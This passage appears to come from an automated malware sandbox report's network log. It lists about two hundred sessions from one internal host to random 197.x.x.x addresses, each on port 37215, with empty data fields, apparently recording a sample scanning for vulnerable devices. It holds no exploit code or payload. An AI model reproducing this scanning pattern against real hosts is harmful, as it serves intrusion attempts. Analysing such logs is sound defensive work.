                                                                            26593192.168.2.1553028197.143.93.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26594192.168.2.1549082197.75.42.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26595192.168.2.1535114197.37.131.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26596192.168.2.1555196197.108.117.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26597192.168.2.1557382197.49.203.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26598192.168.2.1551036197.157.79.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26599192.168.2.1554236197.133.26.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26600192.168.2.1559456197.105.137.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26601192.168.2.1553442197.38.21.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26602192.168.2.1554988197.100.105.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26603192.168.2.1539734197.4.20.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26604192.168.2.1556602197.56.211.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26605192.168.2.1553690197.217.9.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26606192.168.2.1548512197.228.242.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26607192.168.2.1533046197.49.233.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26608192.168.2.1537702197.178.37.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26609192.168.2.1557244197.224.151.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26610192.168.2.1544716197.182.141.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26611192.168.2.1555916197.157.161.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26612192.168.2.1554544197.39.87.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26613192.168.2.1558554197.132.106.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26614192.168.2.1556864197.137.40.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26615192.168.2.1554646197.120.49.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26616192.168.2.1555352197.238.137.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26617192.168.2.1536830197.12.44.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26618192.168.2.1539224197.228.248.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26619192.168.2.1533190197.26.107.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26620192.168.2.1547638197.144.154.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26621192.168.2.1534820197.29.243.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26622192.168.2.1547834197.38.191.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26623192.168.2.1538328197.73.133.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26624192.168.2.1554960197.69.220.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26625192.168.2.1543546197.22.225.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26626192.168.2.1534990197.78.113.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26627192.168.2.1560170197.54.241.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26628192.168.2.1544076197.91.216.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26629192.168.2.1559482197.74.29.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26630192.168.2.1549668197.45.131.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26631192.168.2.1558562197.34.235.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26632192.168.2.1559096197.121.88.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26633192.168.2.1550780197.121.151.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26634192.168.2.1535814197.70.173.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26635192.168.2.1537744197.217.158.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26636192.168.2.1545600197.151.123.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26637192.168.2.1550534197.96.219.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26638192.168.2.1545712197.240.113.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26639192.168.2.1550954197.127.153.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26640192.168.2.1535684197.207.179.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26641192.168.2.1545256197.34.20.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26642192.168.2.1541978197.164.76.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26643192.168.2.1543388197.176.46.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26644192.168.2.1541084197.140.23.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26645192.168.2.1539930197.0.126.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26646192.168.2.1539894197.227.27.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26647192.168.2.1547292197.72.201.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26648192.168.2.1551328197.232.150.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26649192.168.2.1549616197.116.46.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26650192.168.2.1542630197.244.165.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26651192.168.2.1543822197.202.154.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26652192.168.2.1548018197.213.191.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26653192.168.2.1550250197.123.93.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26654192.168.2.1550568197.165.3.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26655192.168.2.1555060197.153.13.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26656192.168.2.1543246197.103.46.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26657192.168.2.1545210197.118.120.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26658192.168.2.1549366197.74.68.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26659192.168.2.1559440197.129.158.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26660192.168.2.1553536197.192.144.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26661192.168.2.1551018197.21.168.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26662192.168.2.1547854197.24.67.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26663192.168.2.1535356197.11.112.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26664192.168.2.1533238197.73.144.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26665192.168.2.1548626197.137.52.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26666192.168.2.1548094197.60.25.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26667192.168.2.1550692197.198.181.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26668192.168.2.1549560197.175.30.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26669192.168.2.1551700197.36.167.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26670192.168.2.1558764197.130.104.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26671192.168.2.1554726197.28.57.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26672192.168.2.1539718197.169.132.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26673192.168.2.1541202197.66.190.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26674192.168.2.1550670197.58.139.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26675192.168.2.1549280197.166.163.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26676192.168.2.1538932197.42.238.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26677192.168.2.1552392197.174.16.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26678192.168.2.1537386197.206.161.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26679192.168.2.1533476197.229.177.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26680192.168.2.1542280197.66.250.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26681192.168.2.1534432197.126.242.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26682192.168.2.1534194197.146.59.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26683192.168.2.1542592197.70.230.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26684192.168.2.1552712197.125.153.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26685192.168.2.1537572197.88.62.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26686192.168.2.1560932197.89.224.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26687192.168.2.1543850197.62.13.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26688192.168.2.1559164197.18.25.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26689192.168.2.1546446197.17.150.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26690192.168.2.1538190197.134.247.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26691192.168.2.1560362197.173.21.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26692192.168.2.1548630197.87.144.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26693192.168.2.1543816197.123.118.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26694192.168.2.1554280197.145.235.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26695192.168.2.1547846197.115.128.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26696192.168.2.1556456197.230.73.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26697192.168.2.1557952197.24.217.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26698192.168.2.1553252197.174.237.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26699192.168.2.1544780197.119.104.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26700192.168.2.1559162197.96.172.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26701192.168.2.1555778197.197.19.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26702192.168.2.1537484197.104.94.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26703192.168.2.1556216197.214.36.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26704192.168.2.1539816197.24.119.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26705192.168.2.1534480197.211.204.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26706192.168.2.1546014197.109.136.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26707192.168.2.1559822197.129.49.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26708192.168.2.1556974197.202.203.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26709192.168.2.1553806197.62.93.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26710192.168.2.1551078197.79.220.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26711192.168.2.1544348197.136.6.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26712192.168.2.1558298197.31.178.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26713192.168.2.1534570197.175.255.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26714192.168.2.1540328197.237.109.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26715192.168.2.1546578197.57.69.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26716192.168.2.1549246197.161.231.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26717192.168.2.1559946197.115.1.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26718192.168.2.1537952197.241.175.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26719192.168.2.1546244197.167.169.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26720192.168.2.1533876197.76.220.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26721192.168.2.1540138197.202.249.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26722192.168.2.1546706197.125.187.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26723192.168.2.1548636197.215.176.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26724192.168.2.1560082197.227.164.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26725192.168.2.1541142197.247.170.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26726192.168.2.1554314197.162.39.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26727192.168.2.1547672197.223.169.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26728192.168.2.1541952197.17.195.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26729192.168.2.1557286197.155.134.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26730192.168.2.1552902197.201.39.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26731192.168.2.1535830197.80.216.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26732192.168.2.1544502197.214.169.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26733192.168.2.1541146197.141.170.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26734192.168.2.1553936197.200.75.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26735192.168.2.1552322197.198.137.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26736192.168.2.1542024197.177.238.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26737192.168.2.1551332197.0.52.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26738192.168.2.1553846197.181.108.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26739192.168.2.1550426197.130.155.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26740192.168.2.1550334197.155.31.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26741192.168.2.1554344197.114.186.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26742192.168.2.1544484197.10.254.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26743192.168.2.1534880197.74.11.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26744192.168.2.1558996197.252.55.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26745192.168.2.1551530197.252.111.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26746192.168.2.1555002197.9.151.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26747192.168.2.1551208197.183.165.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26748192.168.2.1547142197.16.128.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26749192.168.2.1536696197.133.13.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26750192.168.2.1544810197.194.148.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26751192.168.2.1536290197.47.239.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26752192.168.2.1547488197.120.18.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26753192.168.2.1542918197.47.196.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26754192.168.2.1555452197.229.110.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26755192.168.2.1545424197.128.16.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26756192.168.2.1534024197.252.113.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26757192.168.2.1548938197.46.182.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26758192.168.2.1538232197.23.69.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26759192.168.2.1553662197.82.154.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26760192.168.2.1559390197.182.95.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26761192.168.2.1540898197.28.146.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26762192.168.2.1555576197.236.163.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26763192.168.2.1546244197.200.159.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26764192.168.2.1535186197.192.128.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26765192.168.2.1557988197.32.29.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26766192.168.2.1543622197.146.114.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26767192.168.2.1551246197.145.233.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26768192.168.2.1544258197.144.13.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26769192.168.2.1534080197.196.151.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26770192.168.2.1554098197.183.206.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26771192.168.2.1537638197.80.46.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26772192.168.2.1537534197.26.137.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26773192.168.2.1557898197.116.60.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26774192.168.2.1536108197.11.123.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26775192.168.2.1554094197.16.70.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26776192.168.2.1540582197.158.241.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26777192.168.2.1548750197.184.2.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26778192.168.2.1552294197.153.160.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26779192.168.2.1550132197.178.152.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26780192.168.2.1557160197.232.148.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26781192.168.2.1559368197.156.169.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26782192.168.2.1552292197.158.87.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26783192.168.2.1560848197.230.82.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26784192.168.2.1549334197.242.237.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26785192.168.2.1540312197.224.227.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26786192.168.2.1555560197.57.93.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26787192.168.2.1534880197.236.108.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26788192.168.2.1539196197.6.180.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26789192.168.2.1560932197.50.76.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26790192.168.2.1556842197.164.200.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26791192.168.2.1540108197.55.5.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26792192.168.2.1539052197.205.134.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
